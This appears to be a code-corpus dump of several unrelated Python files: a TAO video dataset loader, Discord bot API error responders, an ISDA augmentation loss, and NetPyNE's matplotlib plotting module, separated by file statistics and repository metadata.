                "end ({0}) must be None or greater than start ({1})".format(end, start)
            )

        # videos should be a tuple
        if isinstance(videos, str):
            if os.path.isfile(videos):
                with open(videos, "r") as f:
                    videos = tuple(f.read().split("\n"))
            else:
                raise ValueError("incorrect filename: {} doesn't exist".format(videos))
        elif not (isinstance(videos, tuple)):
            msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
            raise TypeError(msg % type(videos))

        self.RGB_data = []
        self.Seg_data = []
        self.Points_data = []
        self.Videonames_data = []

        idx = np.arange(self.seqlen) * (self.dilation + 1)

        rgbdir = os.path.join(self.basedir, 'JPEGImages/')
        pointsdir = os.path.join(self.basedir, 'points/')
        segdir = os.path.join(self.basedir, 'Annotations/')

        for video in videos:
            file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]

            rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
            if self.return_points:
                points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
            if self.return_seg:
                seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]

            video_len = len(rgb_list)

            for start_index in range(self.start, video_len, self.stride):
                if start_index + idx[-1] >= video_len:
                    break
                inds = start_index + idx

                self.RGB_data.append([rgb_list[ind] for ind in inds])
                if self.return_seg:
                    self.Seg_data.append([seg_list[ind] for ind in inds])
                if self.return_points:
                    self.Points_data.append([points_list[ind] for ind in inds])
                if self.return_videonames:
                    self.Videonames_data.append(video)

        self.num_sequences = len(self.RGB_data)

    def __len__(self):
        r"""Returns the length of the dataset. """
        return self.num_sequences

    def __getitem__(self, idx: int):
        r"""Returns the data from the sequence at index idx.

        Returns:
            color_seq (torch.Tensor): Sequence of rgb images of each frame
            seg_seq (list): Sequence of instance segmentation labels for objects present in the frames
            points_seq (list): Sequence of SuperPoint Features
            videoname (str): Videoname of Sequence

        Shape:
            - color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
            - seg_seq: list of per-frame instance segmentations with length :math:`L`
            - points_seq: list of SuperPoint Features with length :math:`L`
        """

        # Read in the color info.
if self.return_img: color_seq_path = self.RGB_data[idx] if self.return_seg: seg_seq_path = self.Seg_data[idx] if self.return_points: points_seq_path = self.Points_data[idx] color_seq, seg_seq, points_seq = [], [], [] for i in range(self.seqlen): if self.return_img: image = cv2.imread(color_seq_path[i]) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = torch.from_numpy(image).type(torch.float16) image = image.permute(2,0,1) image /= 255 color_seq.append(image) if self.return_seg: instance_img = np.array(Image.open(seg_seq_path[i])) obj_ids = np.unique(instance_img) obj_ids = obj_ids[~np.isin(obj_ids, [0])] frame_ann = [] for obj_id in obj_ids: ann = {} ann['obj_id'] = obj_id ann_mask = np.isin(instance_img, obj_id).astype(int) ann['ann_mask'] = ann_mask frame_ann.append(ann) seg_seq.append(frame_ann) if self.return_points: with open(points_seq_path[i],'rb') as fp: points = pickle.load(fp) points_seq.append(points) output = [] if self.return_img: color_seq = torch.stack(color_seq, 0).float() output.append(color_seq) if self.return_seg: output.append(seg_seq) if self.return_points: output.append(points_seq) if self.return_videonames: output.append(self.Videonames_data[idx]) return tuple(output)
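Indexing the dataset returns tensors for the frames and plain Python lists for the annotations, so batching is simplest with `batch_size=1`. A usage sketch with a hypothetical base directory and video name (both assumptions, not paths from the source):

# Hypothetical paths/videos; assumes the TAO-VOS directory layout described above.
dataset = TAO(
    basedir="/data/TAOVOS",
    videos=("train/YFCC100M/v_example_video",),
    seqlen=4, dilation=1, stride=3,
    return_points=False, return_videonames=True,
)
color_seq, seg_seq, videoname = dataset[0]
print(color_seq.shape)   # torch.Size([4, 3, H, W]) for one sequence
print(len(seg_seq))      # 4 frames' worth of per-object annotation dicts
print(videoname)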
41.788618
135
0.569163
10,229
0.976236
0
0
0
0
0
0
4,228
0.403512
4c573a085ee0bd360c33de2b14ef3c06c724afc8
2,572
py
Python
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
2
2017-09-14T08:07:55.000Z
2021-05-18T05:05:05.000Z
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
111
2018-04-15T14:32:14.000Z
2021-03-28T21:06:29.000Z
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
1
2018-04-15T13:24:44.000Z
2018-04-15T13:24:44.000Z
from typing import TYPE_CHECKING
if TYPE_CHECKING:
    from Platforms.Web.main_web import PhaazebotWeb

import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest

async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
    """
    Optional keywords:
    ------------------
    * msg `str` : (Default: None) * [Overwrites default]
    * channel_id `str` *
    * channel_name `str` *

    Default message (*gets altered by optional keywords):
    ----------------------------------------------------
    Disabled quote channel already exists
    """
    res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")

    channel_id:str = kwargs.get("channel_id", "")
    if channel_id:
        res["channel_id"] = str(channel_id)

    channel_name:str = kwargs.get("channel_name", "")
    if channel_name:
        res["channel_name"] = str(channel_name)

    # build message
    default_msg:str = "Disabled quote channel already exists"
    if channel_name:
        default_msg += f" for '{channel_name}'"

    if channel_id:
        default_msg += f" (Channel ID:{channel_id})"

    msg:str = kwargs.get("msg", default_msg)
    res["msg"] = msg

    cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
    return cls.response(
        text=json.dumps(res),
        content_type="application/json",
        status=400
    )

async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
    """
    Optional keywords:
    ------------------
    * msg `str` : (Default: None) * [Overwrites default]
    * channel_id `str` *
    * channel_name `str` *

    Default message (*gets altered by optional keywords):
    ----------------------------------------------------
    Disabled quote channel does not exist
    """
    res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")

    channel_id:str = kwargs.get("channel_id", "")
    if channel_id:
        res["channel_id"] = str(channel_id)

    channel_name:str = kwargs.get("channel_name", "")
    if channel_name:
        res["channel_name"] = str(channel_name)

    # build message
    default_msg:str = "Disabled quote channel does not exist"
    if channel_name:
        default_msg += f" for '{channel_name}'"

    if channel_id:
        default_msg += f" (Channel ID:{channel_id})"

    msg:str = kwargs.get("msg", default_msg)
    res["msg"] = msg

    cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exist: {WebRequest.path}", require="api:400")
    return cls.response(
        text=json.dumps(res),
        content_type="application/json",
        status=400
    )
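For reference, a rough sketch of the 400 payload these responders assemble, built without a running `PhaazebotWeb` instance; the channel ID and name are made up, and the keys mirror the dict constructed in `apiDiscordConfigsQuoteDisabledChannelExists` above:

```python
# Hypothetical illustration of the JSON body produced by the first responder.
import json

res = dict(status=400, error="discord_disabled_regularchannel_exists")
res["channel_id"] = "1234"        # hypothetical channel ID
res["channel_name"] = "general"   # hypothetical channel name
res["msg"] = "Disabled quote channel already exists for 'general' (Channel ID:1234)"
print(json.dumps(res, indent=2))
```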
28.577778
127
0.691291
0
0
0
0
0
0
2,364
0.919129
1,225
0.476283
4c59684045a1dab8436432732a93183e33f7d39d
3,853
py
Python
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
31
2020-01-14T20:03:31.000Z
2022-01-07T08:02:09.000Z
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
null
null
null
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
6
2020-03-04T09:31:45.000Z
2021-11-21T18:47:15.000Z
import torch import torch.nn as nn class EstimatorCV(): def __init__(self, feature_num, class_num): super(EstimatorCV, self).__init__() self.class_num = class_num self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda() self.Ave = torch.zeros(class_num, feature_num)#.cuda() self.Amount = torch.zeros(class_num)#.cuda() def update_CV(self, features, labels): N = features.size(0) C = self.class_num A = features.size(1) NxCxFeatures = features.view( N, 1, A ).expand( N, C, A ) onehot = torch.zeros(N, C)#.cuda() onehot.scatter_(1, labels.view(-1, 1), 1) NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A) features_by_sort = NxCxFeatures.mul(NxCxA_onehot) Amount_CxA = NxCxA_onehot.sum(0) Amount_CxA[Amount_CxA == 0] = 1 ave_CxA = features_by_sort.sum(0) / Amount_CxA var_temp = features_by_sort - \ ave_CxA.expand(N, C, A).mul(NxCxA_onehot) var_temp = torch.bmm( var_temp.permute(1, 2, 0), var_temp.permute(1, 0, 2) ).div(Amount_CxA.view(C, A, 1).expand(C, A, A)) sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A) sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A) weight_CV = sum_weight_CV.div( sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A) ) weight_CV[weight_CV != weight_CV] = 0 weight_AV = sum_weight_AV.div( sum_weight_AV + self.Amount.view(C, 1).expand(C, A) ) weight_AV[weight_AV != weight_AV] = 0 additional_CV = weight_CV.mul(1 - weight_CV).mul( torch.bmm( (self.Ave - ave_CxA).view(C, A, 1), (self.Ave - ave_CxA).view(C, 1, A) ) ) self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp .mul(weight_CV)).detach() + additional_CV.detach() self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach() self.Amount += onehot.sum(0) class ISDALoss(nn.Module): def __init__(self, feature_num, class_num): super(ISDALoss, self).__init__() self.estimator = EstimatorCV(feature_num, class_num) self.class_num = class_num self.cross_entropy = nn.CrossEntropyLoss() def isda_aug(self, fc, features, y, labels, cv_matrix, ratio): N = features.size(0) C = self.class_num A = features.size(1) weight_m = list(fc.parameters())[0] NxW_ij = weight_m.expand(N, C, A) NxW_kj = torch.gather(NxW_ij, 1, labels.view(N, 1, 1) .expand(N, C, A)) CV_temp = cv_matrix[labels] # sigma2 = ratio * \ # torch.bmm(torch.bmm(NxW_ij - NxW_kj, # CV_temp).view(N * C, 1, A), # (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C) sigma2 = ratio * \ torch.bmm(torch.bmm(NxW_ij - NxW_kj, CV_temp), (NxW_ij - NxW_kj).permute(0, 2, 1)) sigma2 = sigma2.mul(torch.eye(C)#.cuda() .expand(N, C, C)).sum(2).view(N, C) aug_result = y + 0.5 * sigma2 return aug_result def forward(self, model, fc, x, target_x, ratio): features = model(x) y = fc(features) self.estimator.update_CV(features.detach(), target_x) isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio) loss = self.cross_entropy(isda_aug_y, target_x) return loss, y
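A short sketch of how `ISDALoss` is typically wired into a training step. The toy backbone, tensor shapes, and schedule constants are assumptions for illustration (the linear ramp of `ratio` with training progress follows the ISDA paper, but the specific numbers here are made up):

```python
# Minimal sketch, assuming ISDALoss/EstimatorCV from the file above are in scope.
import torch
import torch.nn as nn

feature_num, class_num = 64, 10
backbone = nn.Sequential(nn.Flatten(), nn.Linear(3 * 32 * 32, feature_num), nn.ReLU())
fc = nn.Linear(feature_num, class_num)
criterion = ISDALoss(feature_num, class_num)

x = torch.randn(8, 3, 32, 32)                  # toy batch
target = torch.randint(0, class_num, (8,))
lambda_0, epoch, total_epochs = 0.5, 10, 100   # illustrative schedule constants
ratio = lambda_0 * (epoch / total_epochs)      # augmentation strength grows over training

# forward(model, fc, x, target_x, ratio) updates the covariance estimator,
# augments the logits, and returns (loss, plain logits).
loss, logits = criterion(backbone, fc, x, target, ratio)
loss.backward()
```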
29.868217
104
0.536465
3,812
0.989359
0
0
0
0
0
0
233
0.060472
4c59cbad1a1c628d8be0abf3472039d2b0fe36c6
22,828
py
Python
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
""" Module for plotting analyses """ import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from copy import deepcopy import pickle, json import os from matplotlib.offsetbox import AnchoredOffsetbox try: basestring except NameError: basestring = str colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3 class MetaFigure: """A class which defines a figure object""" def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs): if not sim: from .. import sim self.sim = sim self.kind = kind # Make a copy of the current matplotlib rcParams and update them self.orig_rcParams = deepcopy(mpl.rcParamsDefault) if rcParams: for rcParam in rcParams: if rcParam in mpl.rcParams: mpl.rcParams[rcParam] = rcParams[rcParam] else: print(rcParam, 'not found in matplotlib.rcParams') self.rcParams = rcParams else: self.rcParams = self.orig_rcParams # Set up any subplots if not subplots: nrows = 1 ncols = 1 elif type(subplots) == int: nrows = subplots ncols = 1 elif type(subplots) == list: nrows = subplots[0] ncols = subplots[1] # Create figure if 'figSize' in kwargs: figSize = kwargs['figSize'] else: figSize = self.rcParams['figure.figsize'] if 'dpi' in kwargs: dpi = kwargs['dpi'] else: dpi = self.rcParams['figure.dpi'] if autosize: maxplots = np.max([nrows, ncols]) figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize) figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize) figSize = [figSize0, figSize1] self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi) self.plotters = [] def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs): """ 'eps': 'Encapsulated Postscript', 'jpg': 'Joint Photographic Experts Group', 'jpeg': 'Joint Photographic Experts Group', 'pdf': 'Portable Document Format', 'pgf': 'PGF code for LaTeX', 'png': 'Portable Network Graphics', 'ps': 'Postscript', 'raw': 'Raw RGBA bitmap', 'rgba': 'Raw RGBA bitmap', 'svg': 'Scalable Vector Graphics', 'svgz': 'Scalable Vector Graphics', 'tif': 'Tagged Image File Format', 'tiff': 'Tagged Image File Format' """ if not sim: from .. import sim if fileDesc is not None: fileDesc = '_' + str(fileDesc) else: fileDesc = '_' + self.kind if fileType not in self.fig.canvas.get_supported_filetypes(): raise Exception('fileType not recognized in saveFig') else: fileExt = '.' 
+ fileType if not fileName or not isinstance(fileName, basestring): fileName = self.sim.cfg.filename + fileDesc + fileExt else: if fileName.endswith(fileExt): fileName = fileName.split(fileExt)[0] + fileDesc + fileExt else: fileName = fileName + fileDesc + fileExt if fileDir is not None: fileName = os.path.join(fileDir, fileName) if not overwrite: while os.path.isfile(fileName): try: fileNumStr = fileName.split(fileExt)[0].split('_')[-1] fileNumStrNew = str(int(fileNumStr) + 1).zfill(2) fileName = fileName.split('_' + fileNumStr)[0] except: fileNumStr = fileNumStrNew = '01' fileName = fileName.split(fileExt)[0] fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt self.fig.savefig(fileName) self.fileName = fileName return fileName def showFig(self, **kwargs): try: self.fig.show(block=False) except: self.fig.show() def addSuptitle(self, **kwargs): self.fig.suptitle(**kwargs) def finishFig(self, **kwargs): if 'suptitle' in kwargs: if kwargs['suptitle']: self.addSuptitle(**kwargs['suptitle']) if 'tightLayout' not in kwargs: plt.tight_layout() elif kwargs['tightLayout']: plt.tight_layout() if 'saveFig' in kwargs: if kwargs['saveFig']: self.saveFig(**kwargs) if 'showFig' in kwargs: if kwargs['showFig']: self.showFig(**kwargs) else: plt.close(self.fig) # Reset the matplotlib rcParams to their original settings mpl.style.use(self.orig_rcParams) class GeneralPlotter: """A class used for plotting""" def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs): """ Parameters ---------- data : dict, str axis : matplotlib axis The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin, """ self.kind = kind # Load data if type(data) == str: if os.path.isfile(data): self.data = self.loadData(data) else: raise Exception('In Plotter, if data is a string, it must be the path to a data file.') else: self.data = data if not sim: from .. 
import sim self.sim = sim self.axis = axis if metafig: self.metafig = metafig # If an axis is input, plot there; otherwise make a new figure and axis if self.axis is None: final = True self.metafig = MetaFigure(kind=self.kind, **kwargs) self.fig = self.metafig.fig self.axis = self.metafig.ax else: self.fig = self.axis.figure # Attach plotter to its MetaFigure self.metafig.plotters.append(self) def loadData(self, fileName, fileDir=None, sim=None): from ..analysis import loadData self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None) def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs): from ..analysis import saveData as saveFigData saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs) def formatAxis(self, **kwargs): if 'title' in kwargs: self.axis.set_title(kwargs['title']) if 'xlabel' in kwargs: self.axis.set_xlabel(kwargs['xlabel']) if 'ylabel' in kwargs: self.axis.set_ylabel(kwargs['ylabel']) if 'xlim' in kwargs: if kwargs['xlim'] is not None: self.axis.set_xlim(kwargs['xlim']) if 'ylim' in kwargs: if kwargs['ylim'] is not None: self.axis.set_ylim(kwargs['ylim']) if 'invert_yaxis' in kwargs: if kwargs['invert_yaxis'] is True: self.axis.invert_yaxis() def addLegend(self, handles=None, labels=None, **kwargs): legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map'] # Check for and apply any legend parameters in the kwargs legendKwargs = {} for kwarg in kwargs: if kwarg in legendParams: legendKwargs[kwarg] = kwargs[kwarg] # If 'legendKwargs' is found in kwargs, use those values instead of the defaults if 'legendKwargs' in kwargs: legendKwargs_new = kwargs['legendKwargs'] for key in legendKwargs_new: if key in legendParams: legendKwargs[key] = legendKwargs_new[key] cur_handles, cur_labels = self.axis.get_legend_handles_labels() if not handles: handles = cur_handles if not labels: labels = cur_labels self.axis.legend(handles, labels, **legendKwargs) def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs) def addColorbar(self, **kwargs): plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs) def finishAxis(self, **kwargs): self.formatAxis(**kwargs) if 'saveData' in kwargs: if kwargs['saveData']: self.saveData(**kwargs) if 'dpi' in kwargs: if kwargs['dpi']: self.fig.set_dpi(kwargs['dpi']) if 'figSize' in kwargs: if kwargs['figSize']: self.fig.set_size_inches(kwargs['figSize']) if 'legend' in kwargs: if kwargs['legend'] is True: self.addLegend(**kwargs) elif type(kwargs['legend']) == dict: self.addLegend(**kwargs['legend']) if 'scalebar' in kwargs: if kwargs['scalebar'] is True: self.addScalebar() elif type(kwargs['scalebar']) == dict: self.addScalebar(**kwargs['scalebar']) if 'colorbar' in kwargs: if kwargs['colorbar'] is True: self.addColorbar() elif type(kwargs['colorbar']) == dict: self.addColorbar(**kwargs['colorbar']) if 'grid' in kwargs: 
self.axis.minorticks_on() if kwargs['grid'] is True: self.axis.grid() elif type(kwargs['grid']) == dict: self.axis.grid(**kwargs['grid']) # If this is the only axis on the figure, finish the figure if type(self.metafig.ax) != list: self.metafig.finishFig(**kwargs) # Reset the matplotlib rcParams to their original settings mpl.style.use(self.metafig.orig_rcParams) class ScatterPlotter(GeneralPlotter): """A class used for scatter plotting""" def __init__(self, data, axis=None, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'scatter' self.x = data.get('x') self.y = data.get('y') self.s = data.get('s') self.c = data.get('c') self.marker = data.get('marker') self.linewidth = data.get('linewidth') self.cmap = data.get('cmap') self.norm = data.get('norm') self.alpha = data.get('alpha') self.linewidths = data.get('linewidths') def plot(self, **kwargs): scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths) self.finishAxis(**kwargs) return self.fig class LinePlotter(GeneralPlotter): """A class used for plotting one line per subplot""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'line' self.x = np.array(data.get('x')) self.y = np.array(data.get('y')) self.color = data.get('color') self.marker = data.get('marker') self.markersize = data.get('markersize') self.linewidth = data.get('linewidth') self.alpha = data.get('alpha') def plot(self, **kwargs): linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha) self.finishAxis(**kwargs) return self.fig class LinesPlotter(GeneralPlotter): """A class used for plotting multiple lines on the same axis""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'lines' self.x = np.array(data.get('x')) self.y = np.array(data.get('y')) self.color = data.get('color') self.marker = data.get('marker') self.markersize = data.get('markersize') self.linewidth = data.get('linewidth') self.alpha = data.get('alpha') self.label = data.get('label') def plot(self, **kwargs): numLines = len(self.y) if type(self.color) != list: colors = [self.color for line in range(numLines)] else: colors = self.color if type(self.marker) != list: markers = [self.marker for line in range(numLines)] else: markers = self.marker if type(self.markersize) != list: markersizes = [self.markersize for line in range(numLines)] else: markersizes = self.markersize if type(self.linewidth) != list: linewidths = [self.linewidth for line in range(numLines)] else: linewidths = self.linewidth if type(self.alpha) != list: alphas = [self.alpha for line in range(numLines)] else: alphas = self.alpha if self.label is None: labels = [None for line in range(numLines)] else: labels = self.label for index, line in enumerate(self.y): self.axis.plot( self.x, self.y[index], color=colors[index], marker=markers[index], markersize=markersizes[index], linewidth=linewidths[index], alpha=alphas[index], label=labels[index], ) self.finishAxis(**kwargs) return self.fig class HistPlotter(GeneralPlotter): """A class used for histogram plotting""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'histogram' self.x = data.get('x') self.bins = data.get('bins', None) 
self.range = data.get('range', None) self.density = data.get('density', False) self.weights = data.get('weights', None) self.cumulative = data.get('cumulative', False) self.bottom = data.get('bottom', None) self.histtype = data.get('histtype', 'bar') self.align = data.get('align', 'mid') self.orientation = data.get('orientation', 'vertical') self.rwidth = data.get('rwidth', None) self.log = data.get('log', False) self.color = data.get('color', None) self.alpha = data.get('alpha', None) self.label = data.get('label', None) self.stacked = data.get('stacked', False) self.data = data.get('data', None) def plot(self, **kwargs): histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data) self.finishAxis(**kwargs) return self.fig class ImagePlotter(GeneralPlotter): """A class used for image plotting using plt.imshow""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'image' self.X = data.get('X') self.cmap = data.get('cmap', None) self.norm = data.get('norm', None) self.aspect = data.get('aspect', None) self.interpolation = data.get('interpolation', None) self.alpha = data.get('alpha', None) self.vmin = data.get('vmin', None) self.vmax = data.get('vmax', None) self.origin = data.get('origin', None) self.extent = data.get('extent', None) self.aspect = data.get('aspect', None) self.interpolation = data.get('interpolation', None) self.filternorm = data.get('filternorm', True) self.filterrad = data.get('filterrad', 4.0) self.resample = data.get('resample', None) self.url = data.get('url', None) self.data = data.get('data', None) def plot(self, **kwargs): imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data) self.finishAxis(**kwargs) return self.fig class AnchoredScaleBar(AnchoredOffsetbox): """ A class used for adding scale bars to plots """ def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs): """ Draw a horizontal and/or vertical bar with the size in data coordinate of the give axes. A label will be drawn underneath (center-aligned). - transform : the coordinate frame (typically axes.transData) - sizex,sizey : width of x,y bar, in data units. 0 to omit - labelx,labely : labels for x,y bars; None to omit - loc : position in containing axes - pad, borderpad : padding, in fraction of the legend font size (or prop) - sep : separation between labels and bars in points. 
- **kwargs : additional arguments passed to base class constructor """ from matplotlib.patches import Rectangle from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea bars = AuxTransformBox(axis.transData) if sizex: if axis.xaxis_inverted(): sizex = -sizex bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none")) if sizey: if axis.yaxis_inverted(): sizey = -sizey bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none")) if sizex and labelx: self.xlabel = TextArea(labelx) bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep) if sizey and labely: self.ylabel = TextArea(labely) bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep) AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs) def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): """ Add scalebars to axes Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes - axis : the axis to attach ticks to - matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params - hidex,hidey : if True, hide x-axis and y-axis of parent - **kwargs : additional arguments passed to AnchoredScaleBars Returns created scalebar object """ def get_tick_size(subaxis): tick_size = None tick_locs = subaxis.get_majorticklocs() if len(tick_locs)>1: tick_size = np.abs(tick_locs[1] - tick_locs[0]) return tick_size if matchx: sizex = get_tick_size(axis.xaxis) if matchy: sizey = get_tick_size(axis.yaxis) if 'sizex' in kwargs: sizex = kwargs['sizex'] if 'sizey' in kwargs: sizey = kwargs['sizey'] def autosize(value, maxvalue, scale, n=1, m=10): round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m while value > maxvalue: try: value = round_to_n(0.8 * maxvalue * scale, n, m) / scale except: value /= 10.0 m /= 10.0 return value if ymax is not None and sizey>ymax: sizey = autosize(sizey, ymax, scaley) if xmax is not None and sizex>xmax: sizex = autosize(sizex, xmax, scalex) kwargs['sizex'] = sizex kwargs['sizey'] = sizey if unitsx is None: unitsx = '' if unitsy is None: unitsy = '' if 'labelx' not in kwargs or kwargs['labelx'] is None: kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx) if 'labely' not in kwargs or kwargs['labely'] is None: kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy) # add space for scalebar if space is not None: ylim0, ylim1 = axis.get_ylim() ylim = (ylim0 - space, ylim1) if ylim0 > ylim1: # if y axis is inverted ylim = (ylim0 + space, ylim1) axis.set_ylim(ylim) scalebar = AnchoredScaleBar(axis, **kwargs) axis.add_artist(scalebar) if hidex: axis.xaxis.set_visible(False) if hidey: axis.yaxis.set_visible(False) if hidex and hidey: axis.set_frame_on(False) return scalebar
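A rough usage sketch for the plotter classes above. It only runs inside a working NetPyNE installation, since `GeneralPlotter` imports `sim` from the package; the data values are illustrative, and `kind='line'` is forwarded through `**kwargs` to satisfy `GeneralPlotter.__init__`:

```python
# Hypothetical sketch; requires netpyne to be importable. Values are made up.
import numpy as np

data = {
    'x': np.linspace(0, 1, 50),
    'y': np.linspace(0, 1, 50) ** 2,
    'color': 'blue',
    'marker': None,
    'markersize': None,
    'linewidth': 2,
    'alpha': 1.0,
}
plotter = LinePlotter(data=data, kind='line')   # kind reaches GeneralPlotter via kwargs
fig = plotter.plot(
    title='Example trace',
    xlabel='time (s)',
    ylabel='amplitude',
    showFig=False,
    saveFig=False,
)
```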
34.535552
376
0.56987
19,548
0.856317
0
0
0
0
0
0
4,602
0.201595
4c5b0cb42835f92d5cfa623b7b0648900462ba33
1,069
py
